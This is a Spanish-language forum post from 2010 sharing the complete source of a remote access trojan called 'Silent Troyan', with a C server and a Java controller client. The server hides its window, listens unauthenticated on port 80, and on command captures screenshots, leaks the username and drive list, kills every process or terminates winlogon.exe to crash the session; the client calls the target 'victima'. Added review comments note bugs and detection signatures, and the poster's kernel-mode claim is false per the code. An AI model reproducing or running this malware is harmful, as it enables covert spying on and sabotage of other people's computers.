[source] Silent Troyan
Publicado: 17 Sep 2010, 22:15
Bueno, aquí os dejo el código de un troyano que desarrolló mi amigo Moisés; el server está en C y el cliente en Java, si mal no recuerdo.
Codigo:
salu2!
PD: se me olvidó comentar que este troyano la matanza de procesos la realiza en modo kernel, o sea que puede matar cualquier proceso :D
Codigo:
/*
No me hago responsable del mal uso de este software.
Codigo SilentTroyan
*/
#include <stdio.h>
#include <stdlib.h>
#include "server.h"
#include <winsock.h>
#include <process.h>
#include <tlhelp32.h>
#include <windows.h>
#include <dirent.h>
/* Console logging helpers used throughout the server.
 * PRINT_LOG(x) prints x through "%s", so x must be a NUL-terminated string;
 * PRINT_COORDINATE(x,y) prints two ints as "x,y". Both append a newline. */
#define PRINT_LOG(x) printf("%s%s",x,"\n")
#define PRINT_COORDINATE(x,y) printf("%d%s%d%s",x,",",y,"\n")
/* File-scope GDI state. No function in this listing reads or writes these:
 * CapturarPantalla declares its own locals named bmi, bfh and pbBits, which
 * shadow them. */
BITMAPINFO bmi;
BYTE * pbBits;
BITMAPFILEHEADER * bfh;
/* A heap buffer plus its length in bytes. CapturarPantalla stages the
 * screenshot pixel data in one of these (through the global `p`) before
 * handing it to send(). */
typedef struct mem_encode
{
    char * buffer;
    size_t size;
}mem_encode;
/* File name, size and content buffer used by DownloadFile (through the global
 * `filepointer`). Note there is no `size` member; DownloadFile nevertheless
 * refers to `filepointer->size`. */
typedef struct fops
{
    char * filename;
    int filesize;
    char * buffer;
}fops;
/* Global scratch objects: `p` is allocated by CapturarPantalla and
 * `filepointer` by DownloadFile. Neither is freed anywhere in this listing,
 * and both are shared by every connection thread started from create_server
 * without any synchronization. */
struct mem_encode * p;
struct fops * filepointer;
/* Initializes Winsock (requesting version 2.1) and logs the outcome.
 * NOTE(review): WSAStartup returns 0 on success or a WSA error code, never
 * -1, so the `ret != -1` test always takes the success branch and a failed
 * initialization is still logged as "Iniciado correctamente..". */
void StartupServer()
{
    WSADATA data;
    int ret = WSAStartup(MAKEWORD(2,1),&data);
    if ( ret != -1 )
    {
        PRINT_LOG("Iniciado correctamente..");
    }
    else
    {
        PRINT_LOG("No se puede iniciar el servidor..\n");
    }
}
/* Sends the logical drive root strings (e.g. "C:\") to the client.
 * GetLogicalDriveStrings fills szBuffer with NUL-separated strings ended by
 * an extra NUL; the loop walks them and sends each one as-is, with no
 * separator or terminator, so the client receives them concatenated.
 * The return value of GetLogicalDriveStrings is not checked. The socket is
 * left open; the caller (callback) performs the shutdown. */
void ListarDispositivos(int pSocket)
{
    char szBuffer[MAX_PATH];
    GetLogicalDriveStrings(MAX_PATH, szBuffer);
    char *pch = szBuffer;
    while (*pch) {
        send(pSocket,pch,strlen(pch),0);
        pch = &pch[strlen(pch) + 1];   /* skip to the string after the NUL */
    }
}
/* Captures the whole primary screen and streams it to the client as a BMP
 * file image: BITMAPFILEHEADER, then BITMAPINFOHEADER, then the pixel bytes,
 * followed by shutdown(SD_SEND) to signal end of data.
 *
 * Detection note: the reply starts with the bytes "BM" (bfType is built as
 * ('M' << 8) + 'B', i.e. 'B','M' in little-endian order), so a screenshot
 * response from this server is easy to recognize on the wire.
 *
 * Code as written: the GDI objects are released, but pbBits, p->buffer and
 * p itself are never freed and every send() result is ignored. The locals
 * bmi/bfh/pbBits shadow the file-scope globals of the same names. `p` is
 * allocated with sizeof(mem_encode*) — the size of a pointer, not of the
 * struct — and, being global, is shared by all connection threads. The copy
 * through p->buffer duplicates pbBits, which is already the data to send.
 * biSizeImage is computed for 32 bits per pixel (32 * w * h / 8) although
 * biBitCount is 24; GetDIBits presumably fills only the 24-bpp rows, so the
 * tail of the malloc'd buffer is sent uninitialized — TODO confirm. */
void CapturarPantalla(int pSocket)
{
    BITMAPINFO bmi;
    BITMAPFILEHEADER bfh;
    int nWidth;
    int nHeight;
    HWND hWnd;
    HDC hdc ;
    HDC memDC;
    HBITMAP hbm ;
    HBITMAP hbmOld;
    BYTE *pbBits;
    HANDLE hfile;       /* unused */
    DWORD dwWritten;    /* unused */
    nWidth = GetSystemMetrics(SM_CXSCREEN);
    nHeight = GetSystemMetrics(SM_CYSCREEN);
    hWnd = GetDesktopWindow();
    hdc = GetDC(hWnd);
    memDC = CreateCompatibleDC(hdc);
    hbm = CreateCompatibleBitmap(hdc, nWidth, nHeight);
    hbmOld = (HBITMAP)SelectObject(memDC, hbm);
    /* Copy the desktop DC into the memory bitmap. */
    BitBlt(memDC, 0, 0, nWidth, nHeight, hdc, 0, 0, SRCCOPY);
    ZeroMemory(&bmi, sizeof(bmi));
    bmi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
    bmi.bmiHeader.biWidth = nWidth;
    bmi.bmiHeader.biHeight = nHeight;
    bmi.bmiHeader.biBitCount = 24;
    bmi.bmiHeader.biPlanes = 1;
    bmi.bmiHeader.biCompression = BI_RGB;
    /* Sized for 4 bytes/pixel even though biBitCount requests 24 bpp. */
    bmi.bmiHeader.biSizeImage = 32 * nWidth * nHeight / 8;
    pbBits = (BYTE *) malloc(bmi.bmiHeader.biSizeImage);
    GetDIBits( memDC,
    hbm,
    0,
    bmi.bmiHeader.biHeight,
    pbBits,
    &bmi,
    DIB_RGB_COLORS );
    /* BMP file header: "BM" magic, total size, pixel-data offset. */
    bfh.bfType = ('M' << 8) + 'B';
    bfh.bfSize = sizeof(BITMAPFILEHEADER) +
    bmi.bmiHeader.biSizeImage +
    sizeof(BITMAPINFOHEADER);
    bfh.bfReserved1 = 0;
    bfh.bfReserved2 = 0;
    bfh.bfOffBits = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER);
    /* Stage a second copy of the pixels in the global mem_encode. */
    p = ( struct mem_encode*)malloc(sizeof(mem_encode*));
    p->size = bmi.bmiHeader.biSizeImage;
    p->buffer = (char*)malloc(p->size);
    memcpy(p->buffer,(char*)pbBits,p->size);
    send(pSocket,(char*)&bfh,sizeof(bfh),0);
    send(pSocket,(char*)&bmi.bmiHeader,sizeof(BITMAPINFOHEADER),0);
    send(pSocket,p->buffer,p->size,0);
    shutdown(pSocket,SD_SEND);
    /* Release GDI resources (heap buffers are not released). */
    SelectObject(memDC, hbmOld);
    DeleteDC(memDC);
    ReleaseDC(hWnd,hdc);
    DeleteObject(hbm);
}
/* Sends the account name of the user running the server, then half-closes
 * the socket. GetUserName returns a BOOL (0 on failure), so the `ret != -1`
 * test never fails and `out` is sent even when the call did not fill it.
 * Despite the name, nothing here checks whether the user is an
 * administrator; the reply is the raw name with no terminator. */
void GetUserAdministrator(int pSocket)
{
    char out[MAX_PATH];
    DWORD nNombredeUsuario = sizeof(out);
    int ret = GetUserName(out,&nNombredeUsuario);
    if ( ret != -1 )
    {
        send(pSocket,out,strlen(out),0);
        shutdown(pSocket,SD_SEND);
    }
}
/* Sends every entry name of directory `name` to the client, one send() per
 * entry with no separator, then half-closes the socket (also when opendir
 * failed). Not reachable from callback() in this listing. As written, `buff`
 * is never freed and the DIR handle is never closed with closedir(). */
void ListarArchivos(char * name,int serverSocket)
{
    DIR *d;
    struct dirent *dir;
    d = opendir(name);
    char * buff = (char*)malloc(MAX_PATH);
    if ( d )
    {
        while ((dir = readdir(d)) != NULL)
        {
            sprintf(buff,"%s",dir->d_name);
            send(serverSocket,buff,strlen(buff),0);
        }
    }
    shutdown(serverSocket,SD_SEND);
}
/* Intended to stream a file to the client, but incomplete as posted: it uses
 * `pSocket` and `filepointer->size`, neither of which is declared in this
 * listing (the function takes no socket and struct fops has no `size`
 * member), so it does not compile as shown. It also takes the length of the
 * file NAME as the "file size" and copies the content with fgets/strcpy,
 * which is not binary-safe. Not reachable from callback(). `filepointer` is
 * allocated with sizeof(fops*), the size of a pointer rather than the
 * struct, and nothing allocated here is freed. */
void DownloadFile(char * file)
{
    filepointer = (struct fops*)malloc(sizeof(fops*));
    filepointer->filename = ( char * ) malloc(MAX_PATH);
    strcpy(filepointer->filename,file);
    PRINT_LOG(filepointer->filename);
    /* Length of the name, not of the file contents. */
    filepointer->filesize = strlen(filepointer->filename);
    FILE * fileop = fopen(filepointer->filename,"rb+");
    char buff[filepointer->filesize];
    filepointer->buffer = ( char * ) malloc(filepointer->filesize);
    if ( !fileop )
    {
        PRINT_LOG("Imposible abrir el archivo..");
    }else
    {
        while ( !feof(fileop) )
        {
            if ( fgets(buff,filepointer->filesize,fileop) != NULL )
            {
                strcpy(filepointer->buffer,buff);
                /* pSocket and ->size are not declared in this listing. */
                send(pSocket,filepointer->buffer,filepointer->size,0);
            }
        }
        fclose(fileop);
    }
}
/* Looks up the window handle of this process's console by its current title.
 * Returns the handle when FindWindow finds it; otherwise the function falls
 * off the end without a return statement (undefined behavior for a non-void
 * function whose result is used). Not called anywhere in this listing;
 * EsconderProceso repeats the same lookup inline. */
HWND obtenerHwnd()
{
    char oldConsoleTitle[MAX_PATH];
    GetConsoleTitle(oldConsoleTitle,MAX_PATH);
    HWND hHandle = FindWindow(NULL,oldConsoleTitle);
    if (hHandle) return ( hHandle );
}
/* Hides this process's own console window (located by its title) with
 * SW_HIDE. Called from create_server at startup, so the server runs with no
 * visible window. Detection note: a console process that hides its window
 * immediately after start and then opens a listening socket is a useful
 * behavioral indicator for this sample. */
void EsconderProceso()
{
    char oldConsoleTitle[MAX_PATH];
    GetConsoleTitle(oldConsoleTitle,MAX_PATH);
    HWND hHandle = FindWindow(NULL,oldConsoleTitle);
    if ( hHandle != NULL )
    {
        ShowWindow(hHandle,SW_HIDE);
    }
}
/* Prints the cursor position to stdout in a loop that only ends when
 * GetCursorPos fails. Not called anywhere in this listing. */
void ObtenerCoordenadas()
{
    POINT p;
    while ( GetCursorPos(&p) )
    {
        PRINT_COORDINATE(p.x,p.y);
    }
}
/* Enables the privilege named by lpszPriv (callers pass SE_DEBUG_NAME) on
 * the current process token. Returns 0 if the token cannot be opened or the
 * privilege name is unknown; otherwise returns the BOOL result of
 * AdjustTokenPrivileges.
 * NOTE(review): AdjustTokenPrivileges returns nonzero even when the
 * privilege was not granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so a
 * nonzero return does not prove the privilege is enabled; the callers in
 * this listing ignore the return value anyway.
 * Mitigation note: SeDebugPrivilege is held only by administrative accounts
 * by default, so running without admin rights limits what the callers can
 * subsequently open with PROCESS_ALL_ACCESS. */
int AjustarPrivilegios(LPCSTR lpszPriv) {
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));
    if (!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken)) return 0;
    if (!LookupPrivilegeValue(NULL, lpszPriv, &luid)) {
        CloseHandle(hToken); return 0;
    }
    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    int bRet = AdjustTokenPrivileges(hToken, 0, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}
/* Attempts to crash the session by terminating winlogon.exe — the "BSOD" the
 * name refers to. Takes a Toolhelp32 snapshot, and for each entry named
 * winlogon.exe enables SeDebugPrivilege, opens it with PROCESS_ALL_ACCESS and
 * calls TerminateProcess.
 *
 * NOTE(review): despite the post's description, nothing here runs in kernel
 * mode; this is an ordinary user-mode TerminateProcess that only works if the
 * server already holds administrative rights (SeDebugPrivilege). Running the
 * process as a standard user limits it.
 *
 * Code as written: the entry returned by Process32First is never examined
 * (the loop starts with Process32Next) and its BOOL is compared with -1;
 * `hProc` is first set to a malloc'd pointer that OpenProcess then
 * overwrites (never freed), and CloseHandle is called once on whatever the
 * last OpenProcess returned; hSnapshot is never closed. */
void RemoteBSOD()
{
    HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
    if ( hSnapshot != NULL )
    {
        PROCESSENTRY32 pe;
        pe.dwSize=sizeof(PROCESSENTRY32);
        int ret = Process32First(hSnapshot,&pe);
        if ( ret != -1 )
        {
            HANDLE hProc = (HANDLE)malloc(sizeof(HANDLE));
            while ( Process32Next(hSnapshot,&pe) )
            {
                if ( strcmp(pe.szExeFile,"winlogon.exe") == 0 )
                {
                    AjustarPrivilegios(SE_DEBUG_NAME);
                    PRINT_LOG("Finalizando proceso..");
                    int pid = pe.th32ProcessID;
                    hProc = OpenProcess(PROCESS_ALL_ACCESS,0,pid);
                    if ( hProc != NULL )
                    {
                        TerminateProcess(hProc,-1);
                    }else
                    {
                        PRINT_LOG("Error..");
                    }
                }
            }
            CloseHandle(hProc);
        }
    }
}
/* Per-connection thread body, started by create_server via _beginthread
 * with the accepted socket cast to void*. Reads one message and dispatches
 * on it:
 *   "INICIATE" -> send the drive list (ListarDispositivos)
 *   "MATAMEE"  -> enable SeDebugPrivilege and TerminateProcess every process
 *                 in the snapshot (after the first entry) that OpenProcess
 *                 will open
 *   "SNAPSHOT" -> send a BMP screenshot (CapturarPantalla)
 *   "GETUSER"  -> send the current user name (GetUserAdministrator)
 *   "BSOD123"  -> terminate winlogon.exe (RemoteBSOD)
 * There is no authentication: any peer that can reach the listening port can
 * issue these commands. The command strings are cleartext and make good
 * network-detection signatures for this sample.
 *
 * Code as written: `bytes` is ignored and no terminator is written into
 * `buff`, so PRINT_LOG and the strcmp calls depend on the bytes after the
 * received data happening to contain a NUL. The socket is shut down for
 * sending in some branches but never closed with closesocket(). The MATAMEE
 * branch duplicates RemoteBSOD's loop, including the malloc'd `hProc` that is
 * overwritten and the snapshot handle that is never closed. */
void callback(void * arg)
{
    SOCKET servidor = ( SOCKET ) arg;
    char buff[MAX_PATH];
    int bytes = recv(servidor,buff,sizeof(buff),0);
    PRINT_LOG(buff);
    if ( strcmp(buff,"INICIATE") == 0)
    {
        PRINT_LOG("Iniciando servicios...");
        ListarDispositivos(servidor);
        shutdown(servidor,SD_SEND);
    }
    else if ( strcmp(buff,"MATAMEE") == 0 )
    {
        PRINT_LOG("Listando procesos..");
        HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
        if ( hSnapshot != NULL )
        {
            PROCESSENTRY32 pe;
            pe.dwSize=sizeof(PROCESSENTRY32);
            int ret = Process32First(hSnapshot,&pe);
            if ( ret != -1 )
            {
                HANDLE hProc = (HANDLE)malloc(sizeof(HANDLE));
                while ( Process32Next(hSnapshot,&pe) )
                {
                    int pid = pe.th32ProcessID;
                    AjustarPrivilegios(SE_DEBUG_NAME);
                    hProc = OpenProcess(PROCESS_ALL_ACCESS,0,pid);
                    if ( hProc != NULL )
                    {
                        TerminateProcess(hProc,-1);
                    }
                }
                CloseHandle(hProc);
            }
            shutdown(servidor,SD_SEND);
        }
    }
    else if ( strcmp(buff,"SNAPSHOT") == 0 )
    {
        CapturarPantalla(servidor);
    }
    else if ( strcmp(buff,"GETUSER") == 0)
    {
        GetUserAdministrator(servidor);
    }
    else if ( strcmp(buff,"BSOD123") == 0 )
    {
        RemoteBSOD();
    }
}
/* Server main loop: initializes Winsock, hides the console window, binds a
 * TCP socket to INADDR_ANY:port, listens with a backlog of 30 and accepts
 * connections forever, handing each accepted socket to callback() on a new
 * thread. Never returns.
 * Detection note: an unexpected process listening on the chosen port (80,
 * from main) on all interfaces is the primary host-side indicator.
 *
 * Code as written: socket/bind/listen/accept results are compared with -1
 * (INVALID_SOCKET is ~0 and SOCKET_ERROR is -1, both -1 when held in an
 * int); the `sock` structure is reused as accept's peer-address output; the
 * listening socket is never closed and there is no exit path from the loop. */
void create_server(int port)
{
    StartupServer();
    EsconderProceso();
    struct sockaddr_in sock;
    SOCKET pSocket;
    sock.sin_family = AF_INET;
    sock.sin_port = htons ( port );
    sock.sin_addr.s_addr = INADDR_ANY;
    pSocket = socket(AF_INET,SOCK_STREAM,0);
    if ( pSocket != -1 )
    {
        int ret = bind(pSocket,(struct sockaddr*)&sock,sizeof(sock));
        if ( ret != -1 )
        {
            ret = listen(pSocket,30);
            while ( 1 )
            {
                int size = sizeof(sock);
                ret = accept(pSocket,(struct sockaddr*)&sock,&size);
                if ( ret != -1 )
                {
                    PRINT_LOG("Aceptado..");
                    /* One thread per client; the socket travels as the arg. */
                    _beginthread(callback,0,(void*)ret);
                }
            }
        }
    }
}
/* Starts the server on TCP port 80 (hard-coded); argc/argv are unused.
 * create_server never returns, so the missing return statement is never
 * reached. */
int main(int argc,char ** argv)
{
    create_server(80);
}
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package cliente;
import java.net.*;
import java.io.*;
import javax.swing.JOptionPane;
import java.awt.image.BufferedImage;
import javax.imageio.ImageIO;
import java.awt.*;
import javax.swing.*;
/**
*
* @author moi
*/
/**
 * Client side of the pair posted above. Every method opens a fresh TCP
 * connection to {@code host} on port 80, writes one cleartext command string
 * ("INICIATE", "MATAMEE", "SNAPSHOT", "VISIONAM", "GETUSER" or "BSOD123")
 * and, for some commands, reads the raw reply until the server half-closes.
 * The commands are unencrypted and unauthenticated, which makes them simple
 * network signatures. No method closes its {@link Socket}; errors are only
 * reported through a dialog.
 */
public class Host {
    /** Size of the acknowledgement read by GetPantalla (2 bytes, expected "OK"). */
    public static int RFC_MAX_MESSAGE = 0x02;

    /**
     * Sends "INICIATE" and returns the reply (the server's drive list) read
     * byte by byte until end of stream. On any exception a dialog is shown
     * and whatever was collected so far is returned.
     * NOTE(review): {@code new Socket(host, 80)} connects in the constructor,
     * so the {@code isConnected()} check is presumably always true here.
     */
    public static StringBuilder ConectarConHost(String host)
    {
        StringBuilder bd = new StringBuilder();
        try
        {
            Socket s= new Socket(host,80);
            if ( s.isConnected() == true )
            {
                String output = "INICIATE";
                byte[] buff = output.getBytes();
                OutputStream out = s.getOutputStream();
                out.write(buff,0,buff.length);
                InputStream input = s.getInputStream();
                int reads = 0;
                while ( ( reads = input.read()) != -1 )
                {
                    bd.append((char)reads);
                }
            }
        }catch (Exception e)
        {
            JOptionPane.showMessageDialog(null,e.toString());
        }
        return ( bd );
    }

    /**
     * Sends "MATAMEE", which makes the server terminate every process it can
     * open. Nothing is read back.
     */
    public static void MatarTodosLosProcesos(String host)
    {
        try
        {
            Socket s= new Socket(host,80);
            if ( s.isConnected() == true )
            {
                String output = "MATAMEE";
                byte[] buff = output.getBytes();
                OutputStream out = s.getOutputStream();
                out.write(buff,0,buff.length);
            }
        }catch (Exception ex)
        {
            JOptionPane.showMessageDialog(null,ex.toString());
        }
    }

    /**
     * On a background thread, sends "SNAPSHOT" and writes the raw BMP reply
     * to {@code C:\snapshot.bmp} until end of stream, then shows a dialog.
     * {@code bs} is unused; {@code outs} is not closed when an exception
     * interrupts the copy.
     */
    public static void GetSnapshot(final String host)
    {
        Runnable r = new Runnable()
        {
            public void run()
            {
                try
                {
                    Socket s= new Socket(host,80);
                    OutputStream out = s.getOutputStream();
                    InputStream in = s.getInputStream();
                    FileOutputStream outs = new FileOutputStream("C:\\snapshot.bmp");
                    StringBuilder bs = new StringBuilder();
                    int c = 0;
                    byte[] r = new byte[1024];
                    if ( s.isConnected() == true )
                    {
                        String output = "SNAPSHOT";
                        byte[] buff = output.getBytes();
                        out.write(buff,0,buff.length);
                        while ( ( c = in.read(r)) != -1 )
                        {
                            //Formulario.jLabel1.setIcon(new ImageIcon(r));
                            outs.write(r,0,c);
                        }
                        JOptionPane.showMessageDialog(null,"Snapshot creado correctamente!");
                        outs.close();
                    }
                }catch (Exception ex)
                {
                    JOptionPane.showMessageDialog(null,ex.toString());
                }
            }
        };
        Thread s = new Thread(r);
        s.start();
    }

    /**
     * On a background thread, sends "VISIONAM", waits for a 2-byte "OK", then
     * loops forever sending "RFC x,y" with the local mouse position and
     * appending whatever the server returns to {@code C:\snapshot.png}.
     * NOTE(review): the C server in this post has no handler for "VISIONAM",
     * so against it this path never gets past the "OK" check. The loop has
     * no exit condition and the file is never closed.
     */
    public static void GetPantalla(final String Host)
    {
        Runnable r = new Runnable()
        {
            public void run()
            {
                try
                {
                    Socket s= new Socket(Host,80);
                    OutputStream out = s.getOutputStream();
                    InputStream in = s.getInputStream();
                    FileOutputStream outs = new FileOutputStream("C:\\snapshot.png");
                    StringBuilder bs = new StringBuilder();
                    byte buffs[] = new byte[RFC_MAX_MESSAGE];
                    int c = 0;
                    byte[] r = new byte[1024];
                    if ( s.isConnected() == true )
                    {
                        String output = "VISIONAM";
                        byte[] buff = output.getBytes();
                        out.write(buff,0,buff.length);
                        in.read(buffs,0,buffs.length);
                        String pRead = new String(buffs);
                        if ( pRead.equals("OK"))
                        {
                            while ( true )
                            {
                                Point llpPoint = MouseInfo.getPointerInfo().getLocation();
                                String rfcMessage = "RFC " + String.valueOf(llpPoint.x) + "," + String.valueOf(llpPoint.y);
                                byte[] bff = rfcMessage.getBytes();
                                out.write(bff,0,bff.length);
                                InputStream ins = s.getInputStream();
                                if ( ( c = ins.read(r) ) != -1 )
                                {
                                    outs.write(r,0,c);
                                }
                            }
                        }
                    }
                }catch (Exception ex)
                {
                    JOptionPane.showMessageDialog(null,ex.toString());
                }
            }
        };
        Thread s = new Thread(r);
        s.start();
    }

    /**
     * Sends "GETUSER", reads the reply (the remote account name) until end of
     * stream and shows it in {@code l} prefixed with "Nombre de la victima:".
     */
    public static void GetUser(String host,JLabel l)
    {
        try
        {
            Socket s= new Socket(host,80);
            StringBuilder p = new StringBuilder();
            if ( s.isConnected() == true )
            {
                String output = "GETUSER";
                byte[] buff = output.getBytes();
                OutputStream out = s.getOutputStream();
                out.write(buff,0,buff.length);
                InputStream ret = s.getInputStream();
                String buffb = null;
                int c = 0;
                while ( ( c = ret.read() ) != -1 )
                {
                    p.append((char)c);
                }
                buffb = p.toString();
                l.setText("Nombre de la victima:" + buffb);
            }
        }catch (Exception ex)
        {
            JOptionPane.showMessageDialog(null,ex.toString());
        }
    }

    /**
     * Sends "BSOD123", which makes the server run RemoteBSOD (terminate
     * winlogon.exe). Nothing is read back; {@code p} is unused.
     */
    public static void ProvocarBsod(String host)
    {
        try
        {
            Socket s= new Socket(host,80);
            StringBuilder p = new StringBuilder();
            if ( s.isConnected() == true )
            {
                String output = "BSOD123";
                byte[] buff = output.getBytes();
                OutputStream out = s.getOutputStream();
                out.write(buff,0,buff.length);
            }
        }catch (Exception ex)
        {
            JOptionPane.showMessageDialog(null,ex.toString());
        }
    }
}
PD: se me olvidó comentar que este troyano la matanza de procesos la realiza en modo kernel, o sea que puede matar cualquier proceso :D